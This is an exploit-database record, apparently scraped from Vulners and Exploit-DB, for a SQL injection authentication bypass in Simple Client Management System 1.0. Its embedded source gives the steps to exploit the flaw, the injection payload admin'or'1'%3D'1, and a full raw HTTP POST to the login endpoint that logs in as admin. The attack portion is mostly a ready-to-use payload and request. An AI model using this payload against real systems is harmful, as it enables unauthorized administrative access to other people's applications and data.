Simple Client Management System 1.0 - SQLi (Authentication Bypass)

2021-11-08T00:00:00

Description

{"id": "EDB-ID:50497", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Simple Client Management System 1.0 - SQLi (Authentication Bypass)", "description": "", "published": "2021-11-08T00:00:00", "modified": "2021-11-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/50497", "reporter": "Sentinal920", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-05-13T17:34:34", "viewCount": 186, "enchantments": {"dependencies": {}, "score": {"value": 6.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25005", "CVE-2020-25006"]}]}, "exploitation": null, "vulnersScore": 6.3}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/50497", "sourceData": "# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass)\r\n# Exploit Author: Sentinal920\r\n# Date: 5-11-2021\r\n# Category: Web application\r\n# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip\r\n# Version: 1.0\r\n# Tested on: Kali Linux\r\n# Vulnerable page: Login\r\n# Vulnerable Parameter: \"password\"\r\n\r\n\r\nTechnical description:\r\nAn SQL Injection vulnerability exists in the Simple Client Management\r\nSystem. An attacker can leverage the vulnerable \"password\" parameter\r\nin the \"Login.php\" web page to authenticate as an admin user.\r\n\r\nSteps to exploit:\r\n1) Navigate to http://localhost/cms/admin/login.php\r\n2) Set username as admin and insert your payload in the password parameter\r\n\r\nProof of concept (Poc):\r\nThe following payload inside password will allow you to login into the\r\nweb server as admin\r\nadmin'or'1'%3D'1\r\n\r\n---\r\n\r\nPOST /cms/classes/Login.php?f=login HTTP/1.1\r\nHost: localhost\r\nContent-Length: 51\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nsec-ch-ua-mobile: ?0\r\nOrigin: http://localhost\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost/cms/admin/login.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn\r\nConnection: close\r\n\r\nusername=admin'or'1'%3D'1&password=admin'or'1'%3D'1\r\n\r\n---", "osvdbidlist": [], "exploitType": "webapps", "verified": false}